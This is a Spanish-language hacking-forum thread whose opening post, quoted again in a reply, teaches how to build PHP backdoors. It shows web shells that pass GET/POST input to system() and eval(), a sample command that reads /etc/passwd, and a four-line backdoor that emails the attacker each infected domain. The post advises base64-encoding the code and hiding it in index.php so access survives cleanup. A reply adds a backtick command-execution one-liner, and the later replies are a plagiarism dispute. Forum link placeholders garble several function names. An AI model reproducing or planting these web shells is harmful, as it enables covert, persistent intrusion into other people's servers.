send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdooring con PHP.

  • 17 Respuestas
  • 5251 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
  • Teenager enclosed codes.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« en: Junio 13, 2015, 08:50:15 pm »
Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citar
una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código: PHP
  1. <?php
  2. You are not allowed to view links. Register or Login('comando');
  3. ?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código: PHP
  1. <?php
  2. $var = @You are not allowed to view links. Register or Login($_GET['ejec']);
  3. ?>

Podriamos entrar desde:
Citar
url.com/archivoinfectado.php?ejec=comando

un ejemplo así:
Citar
url.com/archivoinfectado.php?ejec=cat /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget url.com/lol.txt (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
  3. ?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
  3. ?>

Mostrará la ruta de el script, es decir si estamos en web.com/hola/lol.php te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
  3. ?>

Te mostrará en la pantalla Estamos en el dominio You are not allowed to view links. Register or Login


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código: PHP
  1. <?php
  2. You are not allowed to view links. Register or Login('underc0de@outlook.es', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
  3. ?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido “Hola
mucho gusto soy y una IP”.

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login(echo 'hola underc0de';);
  3. ?>
Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. $var You are not allowed to view links. Register or Login($_GET['ejec']);
  3. ?>

lo usamos de está forma:
Citar
url.com/archivoinfectado.php?ejec=echo 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. You are not allowed to view links. Register or Login('underc0de@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. You are not allowed to view links. Register or Login('underc0de@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.
Viejo pdf
« Última modificación: Junio 15, 2015, 01:49:21 pm por Payasako »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    46.67%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Junio 13, 2015, 09:47:27 pm »
Que buen aporte @You are not allowed to view links. Register or Login!
Te dejo 1 c0in!

Saludos!
ANTRAX


Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #2 en: Junio 14, 2015, 06:13:36 am »
Muy buen aporte Payasako, sobre todo para los que se inician y no saben PHP por tanto, tampoco hacer este tipo de backdoors

Saludos.



Desconectado TheWAV.s

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    3.33%
  • Reputación 0
  • #weNasty
    • Ver Perfil
« Respuesta #3 en: Junio 14, 2015, 07:35:10 am »
Gracias por la explicación.

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 525
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #4 en: Junio 14, 2015, 05:45:56 pm »
Otro ejemplo:

tuarchivo.php?cmd=whoami

Código: PHP
  1. echo `{$_GET['cmd']}`


Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #5 en: Junio 15, 2015, 01:08:50 am »
WTF?? ?


You are not allowed to view links. Register or Login
Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citar
una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código: PHP
  1. <?php
  2. You are not allowed to view links. Register or Login('comando');
  3. ?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código: PHP
  1. <?php
  2. $var = @You are not allowed to view links. Register or Login($_GET['ejec']);
  3. ?>

Podriamos entrar desde:
Citar
url.com/archivoinfectado.php?ejec=comando

un ejemplo así:
Citar
url.com/archivoinfectado.php?ejec=cat /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget url.com/lol.txt (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
  3. ?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
  3. ?>

Mostrará la ruta de el script, es decir si estamos en web.com/hola/lol.php te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
  3. ?>

Te mostrará en la pantalla Estamos en el dominio You are not allowed to view links. Register or Login


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código: PHP
  1. <?php
  2. You are not allowed to view links. Register or Login('underc0de@outlook.es', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
  3. ?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido “Hola
mucho gusto soy y una IP”.

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login(echo 'hola underc0de';);
  3. ?>
Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. $var You are not allowed to view links. Register or Login($_GET['ejec']);
  3. ?>

lo usamos de está forma:
Citar
url.com/archivoinfectado.php?ejec=echo 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. You are not allowed to view links. Register or Login('underc0de@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código: PHP
  1. <?php
  2. $var = You are not allowed to view links. Register or Login($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. You are not allowed to view links. Register or Login('underc0de@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.

Post que veo tuyo sin ofender post que no pones los creditos o bien modificas una que otra cosa sacando títulos y demas, lo que posteaste! o compartiste tus conocimientos es un lindo paper del Odiado y amado por muchos Okolcito aka Okol. Ahhh antes que me olvide el paper de Okol esta en la Biblioteca de UC

You are not allowed to view links. Register or Login

Payasako supongo que eres un chico que anda iniciando en estos lares, mejor poner fuente ;) campeón.


Hasta la despedida está idéntica  solo te falto el Saludos OKOL.

PD: Hasta coin!!! x'D como cambiaron las cosas por aquí.


Regards,
Snifer
« Última modificación: Junio 15, 2015, 01:14:44 am por Snifer »
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #6 en: Junio 15, 2015, 01:27:19 am »
Han superado a Antrax, antes era taringa ahora desde la biblioteca de underc0de copian los papers xD
You are not allowed to view links. Register or Login

Desconectado TheWAV.s

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    3.33%
  • Reputación 0
  • #weNasty
    • Ver Perfil
« Respuesta #7 en: Junio 15, 2015, 02:28:43 am »
Citar
Post que veo tuyo sin ofender post que no pones los creditos o bien modificas una que otra cosa sacando títulos y demas, lo que posteaste! o compartiste tus conocimientos es un lindo paper del Odiado y amado por muchos Okolcito aka Okol. Ahhh antes que me olvide el paper de Okol esta en la Biblioteca de UC

You are not allowed to view links. Register or Login

Payasako supongo que eres un chico que anda iniciando en estos lares, mejor poner fuente ;) campeón.


Hasta la despedida está idéntica  solo te falto el Saludos OKOL.

PD: Hasta coin!!! x'D como cambiaron las cosas por aquí.


Regards,
Snifer

Brother no fue el único que copia y pega aquí... sin dejar creditos... Déjalo al menos vuelve a aportar algo util (temas que habia olvidado)

...Y ese tema no es de OKOL, es de Cesar publicado en el 2009...

Saludos.

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 366
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #8 en: Junio 15, 2015, 03:09:20 am »
Entonces es peor de lo que se pensaba todos se van copiando los papers sin fuentes, xD. Jajaja

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #9 en: Junio 15, 2015, 07:44:09 am »
You are not allowed to view links. Register or Login

Brother no fue el único que copia y pega aquí... sin dejar creditos... Déjalo al menos vuelve a aportar algo util (temas que habia olvidado)

...Y ese tema no es de OKOL, es de Cesar publicado en el 2009...

Saludos.

Entonces lo dejo que siga copy y paste en todo? ademas de no ser el único post? dejo que crezca la ignorancia de las personas y que se acostumbren a ello? solo porque recupera post del ayer? xDDDD Buena tu lógica.

Si fuera de Cesar o de Okol la cuestión es que yo conozco de Okol lo que me acordé, y bueno si tienes fuente original comparte.

Regards,
Snifer

PD: Y no aparece...
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado TheWAV.s

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    3.33%
  • Reputación 0
  • #weNasty
    • Ver Perfil
« Respuesta #10 en: Junio 15, 2015, 10:13:27 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Brother no fue el único que copia y pega aquí... sin dejar creditos... Déjalo al menos vuelve a aportar algo util (temas que habia olvidado)

...Y ese tema no es de OKOL, es de Cesar publicado en el 2009...

Saludos.

Entonces lo dejo que siga copy y paste en todo? ademas de no ser el único post? dejo que crezca la ignorancia de las personas y que se acostumbren a ello? solo porque recupera post del ayer? xDDDD Buena tu lógica.

Si fuera de Cesar o de Okol la cuestión es que yo conozco de Okol lo que me acordé, y bueno si tienes fuente original comparte.

Regards,
Snifer

PD: Y no aparece...

No dije eso hermano, quiero decir que varias referencias (Variables) fueron sacadas tal y como esta escrito de una publicación que trata sobre PHP en donde el autor es Cesar, hace más de 7 años lo demás es original de OKOL.

Bueno no hay por que hacer un lio por esto, como se escribe atrás es para fines educativos... pero si estuvo mal que el edite sin consentimiento muchas partes de ese tema  y hacerlo suyo mucho menos sin dejar créditos.

Veamos si responde o no...

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #11 en: Junio 15, 2015, 10:25:36 am »
Exacto!  el detalle esta el realizar cambios solo de código y hacerlo pasar como si fuera de uno si Okol saco xD npi! yo a lo que me recordé indique como dices toca esperar que dice el autor como también los responsables de dicho foro.

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado [Kounterfeit]

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
  • XMPP: kounterfeit@lsd-25.ru
    • Yahoo Instant Messenger - kounterfeit@lsd-25.ru
    • Ver Perfil
    • Email
  • Skype: kounterfeit@lsd-25.ru
  • Twitter: @dmt_ez
« Respuesta #12 en: Septiembre 11, 2015, 10:20:04 pm »
buenisimoo el crafting de shells y backdoors es uno de los temas que mas me interesa, luego voy a dejar un thread con algunas cosas mas para agregar.Buen aporte bro

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 62
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Septiembre 14, 2015, 06:03:18 pm »
El típico método, buen aporte.

Saludos.

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #14 en: Septiembre 14, 2015, 09:55:20 pm »
You are not allowed to view links. Register or Login
El típico método, buen aporte.

Saludos.

De copiar y pegar y sin dar créditos ?

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 62
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #15 en: Septiembre 15, 2015, 05:45:56 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
El típico método, buen aporte.

Saludos.

De copiar y pegar y sin dar créditos ?

Regards,
Snifer

No entendí claramente tu cita, si lo dices por el post de Payasako no creo que sea plagio ya que el backdooring es tan básico en el hacking, todos tenemos conocimiento previo de aquello..

Saludos.
« Última modificación: Junio 16, 2016, 04:32:16 pm por Decode »

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 87
  • Actividad:
    0%
  • Reputación 0
  • Teenager enclosed codes.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« Respuesta #16 en: Septiembre 16, 2015, 08:19:53 am »
Jeje estás echo un Granujilla @You are not allowed to view links. Register or Login

Mira, te voy a faltar el respeto porque te lo mereces. Antes de todo, el tutorial no tenia ningún tipo de autor, (Yo tampoco he afirmado que sea mio) por otra parte, ha habido foros en lo que lo he posteado y he dejado claro que no era mio, y por otra parte, tambien decirte que no soy nuevo por estos lares, llevo 27 años en la Seguridad informática y de echo, también me atrevo a mencionar tu blog de Sniffer Labs, ¿Cuántos tutoriales de ahí son tuyos?

Venga un saludo granuja, no me he puesto muy duro contigo por pena pero solo quiero decirte que también vale informarse antes de ladrar, si yo ahora te digo "panchito" llevaria la razón aunque no tengo pruebas ni nada, lo mismo pasa colega.

Un saludo desde mi sede de seguridad informática en Madrid, algo que nunca tendrás tu.

Hayy la envidia que te entra eh, pues se tu tambien inteligente y copia posts para que te den coins, TONTO. Ah no, que en tu blog no hay coins, mala suerte.

Hasta luego granuja.

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #17 en: Septiembre 16, 2015, 12:58:29 pm »
You are not allowed to view links. Register or Login
Jeje estás echo un Granujilla @You are not allowed to view links. Register or Login

Mira, te voy a faltar el respeto porque te lo mereces. Antes de todo, el tutorial no tenia ningún tipo de autor, (Yo tampoco he afirmado que sea mio) por otra parte, ha habido foros en lo que lo he posteado y he dejado claro que no era mio, y por otra parte, tambien decirte que no soy nuevo por estos lares, llevo 27 años en la Seguridad informática y de echo, también me atrevo a mencionar tu blog de Sniffer Labs, ¿Cuántos tutoriales de ahí son tuyos?

Venga un saludo granuja, no me he puesto muy duro contigo por pena pero solo quiero decirte que también vale informarse antes de ladrar, si yo ahora te digo "panchito" llevaria la razón aunque no tengo pruebas ni nada, lo mismo pasa colega.

Un saludo desde mi sede de seguridad informática en Madrid, algo que nunca tendrás tu.

Hayy la envidia que te entra eh, pues se tu tambien inteligente y copia posts para que te den coins, TONTO. Ah no, que en tu blog no hay coins, mala suerte.

Hasta luego granuja.

jajajajajaja lucha de egos? tranquilo campeón te dejo con tu sede de seguridad bien por ti, basta con decir me equivoque si revisas una busqueda en Google encontraras el documento ;).

Respira y tranquilizate campeón.

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!